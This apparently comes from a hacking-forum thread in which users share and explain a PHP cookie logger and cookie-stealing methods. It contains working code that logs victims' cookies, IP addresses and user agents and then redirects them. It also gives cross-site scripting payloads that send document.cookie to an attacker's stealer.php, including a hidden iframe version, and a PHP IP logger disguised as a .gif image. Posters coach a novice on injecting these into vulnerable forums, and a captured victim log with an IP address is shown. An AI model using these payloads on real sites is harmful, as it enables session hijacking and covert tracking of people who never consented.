cookielogger
heres what mine looks like
$date = date('d/m/y H:i:s' ); //gets date
$user['agent'] = $_SERVER['HTTP_USER_AGENT']; // get user agent
$user['ip'] = $_SERVER['REMOTE_ADDR'] ? $_SERVER['REMOTE_ADDR'] : $_SERVER['HTTP_X_FORWARDED_FOR']; //get ip address (will see through most proxies)
$user['referer'] = $_SERVER['HTTP_REFERER']; //get referer
$user['cookie'] = $HTTP_GET_VARS['cookie']; //get cookie
$text = '<br />' . '------------------------------------------------------------------------------------------------------------' . '<br />' . "<font size='+1'>" . $date . '</font>' . '<br />' . '<b>User Agent: </b>' . $user['agent'] . '<br />' . '<b>IP Address: </b>' . $user['ip'] . '<br />' . '<b>Referer: </b>' . $user['referer'] . '<br />' . '<b>Cookies: </b>' . $user['cookie'];
$file = fopen( 'cookies.htm', 'a' ) or die(" " ); //opens the file, cookies.htm
fwrite( $file, $text ); //writes the variables file and text to cookies.htm
fclose( $file ); //closes file
header('location:http://www.google.com' ) //will put victim to whatever page you want (change google.com)
?>```
the code is a little messy but it works really well
moshbat wrote: Would that work getting the cookie if the user has just come from another site?
Yeah as long as you add the .php?cookie=" then +document.cookie; at the end. What that does is it takes the current document.cookie, and forwards it to your PHP as the $cookie variable.
<?php
putenv("TZ=GMT+1");
function clean ($var)
{
return htmlspecialchars($var);
}
$ip = clean($_SERVER['REMOTE_ADDR']);
$ref = clean($_SERVER['HTTP_REFERER']);
$time = time();
$readable_time = date("Y\-m\-d\, H\:i");
$entry = "|<u>$time ($readable_time)</u>| <b>IP:</b> $ip, <b>Ref:</b> $ref<br /> \r\n";
$fp = fopen('iplog.html', "a") or die('Cannot open logfile');
fwrite($fp, $entry);
fclose($fp);
$file = "imagesource.gif";
$fp = fopen($file, "r") or die('Cannot grab image source');
$content = fread($fp, filesize($file));
header("Content-type: image/gif");
echo $content;
fclose($fp);
?>
Like this little snippet of code, you just throw in imagesource.gif, a .htaccess with:
AddHandler application/x-httpd-php .gif
And name the PHP file to whatever.gif and voila, you can link forums with that image and log information. Extremely skiddish but kinda fun/useful at times.
Edit: THis whole post is a mess sry LOL I was trying to say 2 things at once, the image one CAN'T GET COOKIES, you need to be redirected from site A to cookie stealer to get cookies. Sorry if I confused anyone :p
Another way to use the stealer is to use iframes so something like this
<iframe src='http://www.site.com/stealer.php?=' +document.cookie height='0' width='0'></iframe>
This way the victim would not see anything weird happen and would not get redirected or anything.
to inject it you would need to find a vulnerability in a site so for example, if a site was: www.site.com/?action=bluh you would change bluh to the code i just wrote. if the site is vulnerable then the code will run and you would just need some one to click on www.site.com/?action=<iframe src='site.com/stealer.php?=' + document.cookie height='0' width='0'></iframe>
Another way is to to directly put the code on a site that uses $_POST or $_GET. So if a forum was vulnerable you would just put the code in the message part and submit it. However, many sites will filter tags so it can be annoying to find an exploit.
silent_assassin wrote: Eh shit happens..
So i did it to myself on another computer. Now how do i inject it..
By injecting javascript using HTML (script tags) into a page (gotta find an input that doesn't filter HTML out), and then use javascript to redirect the person on the page to your cookie stealer. Basically, use any form field where you can input data (sometimes in the URL bar) to this:
<script>document.location="http://www.site.com/stealer.php?cookie=" + document.cookie;</script> You gotta get that to actually work, not just pass through as text but get the javascript to work on the target site.
ok i got this from cookielogging
<br /><font size='+1'>28/04/08 23:34:23</font><br /><b>User Agent: </b>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14<br /><b>IP Address: </b>66.41.188.12<br /><b>Referer: </b>http://z11.invisionfree.com/yesyesyes/index.php?showuser=1<br /><b>Cookies: </b
Can someone explain to me again what i should do…
sorry about all of this.
silent_assassin wrote: ok i got this from cookielogging
<br /><font size='+1'>28/04/08 23:34:23</font><br /><b>User Agent: </b>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14<br /><b>IP Address: </b>66.41.188.12<br /><b>Referer: </b>http://z11.invisionfree.com/yesyesyes/index.php?showuser=1<br /><b>Cookies: </b
Can someone explain to me again what i should do…
sorry about all of this.
You got everything except for a cookie lol so you can't do anything :p
Read this:
http://www.milw0rm.com/papers/192
Everything you need to know about cookie logging and how to do it is in there.
=]
edit Or you could just use whiteacid's community cookie logger which is a great tool..but i prefer to use my own.
http://ccl.whiteacid.org/reg.php
:D